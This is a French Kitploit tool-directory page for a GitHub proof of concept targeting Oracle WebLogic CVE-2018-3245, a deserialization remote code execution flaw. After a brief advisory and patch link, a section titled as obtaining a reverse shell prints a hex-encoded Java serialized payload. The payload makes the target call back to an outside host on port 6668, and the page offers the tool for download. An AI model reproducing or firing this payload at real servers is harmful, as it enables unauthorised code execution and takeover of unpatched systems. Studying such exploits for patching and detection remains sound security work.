Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-3245 — CVE-2018-3245 | Kitploit
Outils/GitHubGitHub/jas502n/cve-2018-3245
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubjas502n/cve-2018-3245

CVE-2018-3245

CVE-2018-3245

Voir le dépôt
1410il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Weblogic-CVE-2018-3245

CVE-2018-3245

0x00 Introduction

Le 16 octobre, heure locale, soit le 17 octobre à 1h du matin, heure de Pékin, Oracle a publié la mise à jour critique des correctifs (CPU) du mois d'octobre (troisième trimestre),

qui corrige une vulnérabilité d'exécution de code à distance dans Weblogic (CVE-2018-2893) qui n'avait pas été entièrement corrigée dans le correctif CPU du mois de juillet (deuxième trimestre). Le nouveau correctif porte le numéro CVE-2018-3245.

Solution

Oracle a corrigé cette vulnérabilité dans la présente mise à jour critique des correctifs (CPU). Il est fortement recommandé aux utilisateurs concernés de mettre à niveau dès que possible pour se protéger.

Remarque : Les correctifs officiels d'Oracle nécessitent un compte de licence de logiciel authentique. Connectez-vous à https://support.oracle.com avec ce compte pour télécharger le dernier correctif.

Lien CPU officiel Oracle :

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

0x01 Obtenir un reverse shell

root@kitploit:~
jas502n-poc.txt 

Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078

Télécharger l’outil